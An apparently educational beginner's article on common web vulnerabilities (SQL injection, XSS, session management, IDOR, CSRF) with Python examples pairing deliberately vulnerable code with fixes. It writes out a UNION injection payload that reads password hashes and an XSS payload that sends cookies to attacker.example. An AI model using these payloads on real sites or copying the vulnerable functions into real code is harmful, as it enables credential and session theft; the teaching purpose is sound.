Security is a major concern in website administration. Every year a large number of websites are hacked and misused by malicious actors, so it is important to get some security education even if you are a non-technical blogger or a small business owner who would rather not get into technical details.

 

Why do you need to know about security?

You can think of it as having CCTV cameras installed in your supermarket. You might not be a fan of the cameras themselves, but when you have them installed you make sure you understand enough about them to get the intended benefit and to make sure that nobody tampers with them.

In the same way, it is wise to gain basic knowledge of the attacks and vulnerabilities that can compromise the safety of your site. So we are starting this series on site security issues for beginners.
 

In this first part we talk about the major types of web security issues:

SQL Injection

SQL Injection ranks at the top of the most common security vulnerabilities. In a SQL Injection attack the attacker reaches the mission-critical content of your database and reads or corrupts it.

SQL Injection lets the attacker execute SQL statements of their own choosing. Because SQL statements control the backend database server, finding a vulnerable input point lets the attacker bypass the application's security and authorization checks, access the database directly and interfere with it by adding, deleting or editing records.

Once the injected statement executes, the attacker can read, modify, create or delete your vital backend data, which can do immense harm to your business.

A popular and easy to understand example is Union-based SQL Injection, which uses the UNION operator to join the results of at least two SELECT statements into a single result set, so that the attacker's own SELECT (for example against a table of user credentials) is returned alongside the rows of the legitimate query.
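The following is an added example, not code from the original article: a small Python script against an in-memory SQLite database (constructed sample data, with a hypothetical products table and a users table) that shows a Union-based injection succeeding against a query built by string concatenation and failing against the same query written with a bound parameter.

```python
import sqlite3

# Constructed sample data, assumed for this example: a public products table
# and a users table that the search feature should never expose.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (1, 'pen', '1.50'), (2, 'notebook', '4.00');
        CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-password');
        """
    )
    return conn


def search_vulnerable(conn, term):
    """Vulnerable: user input is pasted into the SQL text and parsed as SQL."""
    sql = f"SELECT id, name, price FROM products WHERE name = '{term}'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Safe: the placeholder is bound to the value, so the term is data only."""
    sql = "SELECT id, name, price FROM products WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()


# The attacker closes the string literal, appends a SELECT with the same
# number of columns against another table, and comments out the rest.
UNION_PAYLOAD = "x' UNION SELECT id, username, password_hash FROM users--"


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable:", search_vulnerable(conn, UNION_PAYLOAD))
    print("safe:      ", search_safe(conn, UNION_PAYLOAD))
```

The vulnerable search returns the admin's credential row because the attacker's SELECT has the same three columns as the original query; the parameterized search simply looks for a product literally named after the payload and returns nothing.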





What is the best tool to prevent SQL Injection attacks?

The most reliable defence is in your own code: use parameterized (prepared) queries so that user input is always passed as data and never pasted into the SQL text. To analyse or inspect the SQL statements your application builds, you can use General SQL Parser.

Here is the URL: http://www.sqlparser.com/

 

CROSS SITE SCRIPTING (XSS)

Popularly known as XSS, Cross Site Scripting occurs when an attacker injects JavaScript or similar client-side script into the output of a web application, so that the script runs in the browsers of other visitors. It is also one of the most common security vulnerabilities in web applications. Because the injected script runs with the privileges of your site inside the victim's browser, the attacker can make the application behave however they wish for that user.

 

How XSS can affect your site?

It allows attackers to change website content or redirect visitors to objectionable sites. In many cases it also lets attackers eavesdrop on user sessions or hijack them. All of this is done by executing scripts in the victim's browser.
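As an added example that is not part of the original article, here is a Python rendering of a hypothetical profile page with three constructed attacker inputs: a script tag, an attribute breakout, and a javascript: link. The vulnerable version drops the values straight into the HTML; the safe version encodes each value for the context it lands in and validates the URL scheme, since escaping alone does not neutralise a javascript: URL in an href.

```python
import html
from urllib.parse import urlparse

# Constructed attacker inputs, assumed for this example.
SCRIPT_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'
JS_URL_PAYLOAD = "javascript:alert(document.cookie)"


def safe_url(url):
    """Only allow http(s) links; escaping alone does not stop javascript: URLs."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return "#"
    return url


def render_profile_vulnerable(display_name, homepage):
    """Vulnerable: user-controlled values are placed into HTML unencoded."""
    return (
        f"<p>Welcome, {display_name}</p>"
        f'<a href="{homepage}">homepage</a>'
        f'<input name="nick" value="{display_name}">'
    )


def render_profile_safe(display_name, homepage):
    """Safe: encode for the HTML context the value lands in."""
    name_text = html.escape(display_name)                  # element content
    name_attr = html.escape(display_name, quote=True)      # quoted attribute
    href = html.escape(safe_url(homepage), quote=True)     # URL, validated first
    return (
        f"<p>Welcome, {name_text}</p>"
        f'<a href="{href}">homepage</a>'
        f'<input name="nick" value="{name_attr}">'
    )


if __name__ == "__main__":
    print(render_profile_vulnerable(SCRIPT_PAYLOAD, JS_URL_PAYLOAD))
    print(render_profile_safe(SCRIPT_PAYLOAD, JS_URL_PAYLOAD))
    print(render_profile_safe(ATTRIBUTE_PAYLOAD, "https://example.com/"))
```

In a real application the same rule applies to whatever template engine you use: rely on its automatic output encoding, and treat any "raw" or "safe" marker that disables it as a review item.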

 

What are the best tools to prevent Cross Site Scripting (XSS)?

The following page gives guidance on protecting against XSS attacks: https://www.veracode.com/security/cross-site-scripting-prevention

Broken Authentication & Session Management

Identity management plays a vital role in determining the privacy and safety of your users. However, broken authentication or session management can expose users to a number of site security issues.

Failing to protect login credentials and session identifiers around the clock leaves loopholes that give an attacker a clear path to take over an active session, masquerade as the user and trick the system into treating them as the original user.
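The following is an added example, not code from the original article, of the session-management controls that close those loopholes: a hypothetical in-memory session store (a real site would back it with a database or cache) that issues unguessable IDs, enforces idle and absolute timeouts, rotates the ID on login so a fixated ID is useless, and sets the cookie flags that keep the ID away from scripts and plain HTTP.

```python
import secrets
import time

# Hypothetical in-memory session store, assumed for this example; a real site
# would back it with a database or cache, but the checks are the same.
class SessionStore:
    def __init__(self, idle_timeout=15 * 60, absolute_timeout=8 * 3600, clock=time.time):
        self.idle_timeout = idle_timeout
        self.absolute_timeout = absolute_timeout
        self.clock = clock
        self._sessions = {}

    def create(self, user_id):
        # 256 bits from the OS CSPRNG: not guessable, unlike counters or timestamps
        sid = secrets.token_urlsafe(32)
        now = self.clock()
        self._sessions[sid] = {"user": user_id, "created": now, "last_seen": now}
        return sid

    def get_user(self, sid):
        """Return the user for a live session, or None if unknown or expired."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self.clock()
        if now - s["last_seen"] > self.idle_timeout or now - s["created"] > self.absolute_timeout:
            self.destroy(sid)
            return None
        s["last_seen"] = now
        return s["user"]

    def rotate(self, old_sid):
        """Issue a fresh ID on login or privilege change, defeating session fixation."""
        user = self.get_user(old_sid)
        if user is None:
            return None
        created = self._sessions[old_sid]["created"]
        self.destroy(old_sid)
        new_sid = self.create(user)
        self._sessions[new_sid]["created"] = created  # absolute lifetime carries over
        return new_sid

    def destroy(self, sid):
        self._sessions.pop(sid, None)


def session_cookie_header(sid):
    """Cookie flags that keep the ID away from scripts and off plain HTTP."""
    return f"Set-Cookie: session={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("alice")
    print(session_cookie_header(sid))
    print("rotated to a new ID:", store.rotate(sid) != sid)
```

The clock is injectable so that the timeout logic can be tested without waiting; everything else is what a login handler would call: create or rotate on successful login, get_user on every request, destroy on logout.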

 

 

Is there any tool to prevent Broken Authentication and Session Management?

One trusted resource for checking these vulnerabilities is

https://hdivsecurity.com/owasp-broken-authentication-and-session-management

Insecure Direct Object References

An Insecure Direct Object Reference occurs when the application URL (or a form field) contains a direct reference to an internal object, such as a database record key, a directory or a file name, and the application does not check that the requesting user is allowed to access that object. An attacker simply changes the reference to reach other users' data and misuse it.
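As an added example that is not part of the original article, the Python below uses constructed invoice data to contrast a lookup that trusts the id from the URL with one that scopes the lookup to the requesting user, and adds a hypothetical indirect reference map that hands each user opaque handles so real database ids never appear in URLs at all.

```python
import secrets

# Constructed data, assumed for this example: invoices keyed by their database id.
INVOICES = {
    101: {"owner": "alice", "amount": "120.00"},
    102: {"owner": "bob", "amount": "75.00"},
}


class Forbidden(Exception):
    pass


def get_invoice_vulnerable(current_user, invoice_id):
    """Vulnerable: the id from the URL is trusted; any logged-in user can read any invoice."""
    return INVOICES[invoice_id]


def get_invoice_safe(current_user, invoice_id):
    """Safe: the lookup is scoped to the requesting user.

    Missing and not-owned invoices get the same response so an attacker
    cannot use the difference to enumerate which ids exist.
    """
    inv = INVOICES.get(invoice_id)
    if inv is None or inv["owner"] != current_user:
        raise Forbidden(f"user {current_user} may not access invoice {invoice_id}")
    return inv


class IndirectReferenceMap:
    """Per-user opaque handles, so real database ids never appear in URLs."""

    def __init__(self):
        self._by_user = {}   # user -> {handle: real id}

    def handle_for(self, user, invoice_id):
        handles = self._by_user.setdefault(user, {})
        for handle, real in handles.items():
            if real == invoice_id:
                return handle
        handle = secrets.token_urlsafe(16)
        handles[handle] = invoice_id
        return handle

    def resolve(self, user, handle):
        """Return the real id only if this handle was issued to this user."""
        real = self._by_user.get(user, {}).get(handle)
        if real is None:
            raise Forbidden(f"unknown handle for user {user}")
        return real


if __name__ == "__main__":
    print("leak:", get_invoice_vulnerable("alice", 102))
    try:
        get_invoice_safe("alice", 102)
    except Forbidden as exc:
        print("blocked:", exc)
```

The ownership check is the essential fix; the indirect map is an extra layer that also stops attackers from learning how many records exist by counting ids.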

 

How can I test for Insecure Direct Object References?

You can find the details on testing your site for this type of attack at the link below:

https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_Refer... (OTG-AUTHZ-004)

 

What is Cross-Site Request Forgery (CSRF)?

In CSRF a user is tricked into performing an unintended action on a site where they are logged in, by visiting a third-party website controlled by the attacker. The attacker's page sends a request to the vulnerable web application, and because the browser automatically attaches the user's session cookie, the application treats the forged request as a legitimate authenticated action even though the user never intended it.

It lets the attacker act through the user's authenticated browser. Social media, online banking and in-browser email clients are among the key targets of this attack.
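The following is an added example, not code from the original article, of the standard defence: a synchronizer token tied to the session, combined with an Origin header check, in front of a hypothetical money-transfer endpoint at an assumed site origin. The legitimate form echoes the token back; the forged request from the attacker's page carries the victim's cookie but cannot carry the token.

```python
import hmac
import secrets

# Assumed site origin for this example.
SITE_ORIGIN = "https://bank.example"


def issue_csrf_token(session):
    """Create (once per session) the secret the real form must echo back."""
    token = session.get("csrf_token")
    if token is None:
        token = secrets.token_urlsafe(32)
        session["csrf_token"] = token
    return token


def csrf_valid(session, submitted_token, origin_header):
    """Synchronizer token check plus Origin header check.

    A cross-site page cannot read the token out of the victim's session or
    the legitimate form, and the browser sets Origin on cross-site POSTs.
    """
    expected = session.get("csrf_token")
    if not expected or not submitted_token:
        return False
    if origin_header is not None and origin_header != SITE_ORIGIN:
        return False
    return hmac.compare_digest(expected, submitted_token)   # constant-time compare


def transfer_handler(session, form, headers):
    """Hypothetical state-changing endpoint; returns (status, body)."""
    if "user" not in session:
        return 401, "login required"
    if not csrf_valid(session, form.get("csrf_token"), headers.get("Origin")):
        return 403, "CSRF check failed"
    return 200, f"{session['user']} transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    session = {"user": "alice"}   # the cookie-backed session the browser attaches
    token = issue_csrf_token(session)
    # Request from the bank's own form
    print(transfer_handler(session, {"to": "bob", "amount": "10", "csrf_token": token},
                           {"Origin": SITE_ORIGIN}))
    # Forged request auto-submitted from attacker.example: cookie goes along, token does not
    print(transfer_handler(session, {"to": "mallory", "amount": "5000"},
                           {"Origin": "https://attacker.example"}))
```

Setting the session cookie with SameSite=Lax or Strict adds a third, browser-enforced layer, but the token check should stay because older browsers and some cross-site navigations do not honour it.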

 

Is there any tool to check CSRF vulnerability?

You can check whether you are vulnerable to CSRF using this tool:

URL: http://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project

 

Conclusion

To keep your site safe and secure against attackers, it is important to have basic knowledge of site security issues. So we have started this Site Security for Beginners series, in which we will regularly discuss issues that can affect the security of your site, such as common web server vulnerabilities, and the tools to prevent them. In this first part we have discussed common web application vulnerabilities and attacks, with a brief introduction to how they are carried out. In the next part we will discuss the best tips, tricks and tools for steering clear of these attacks.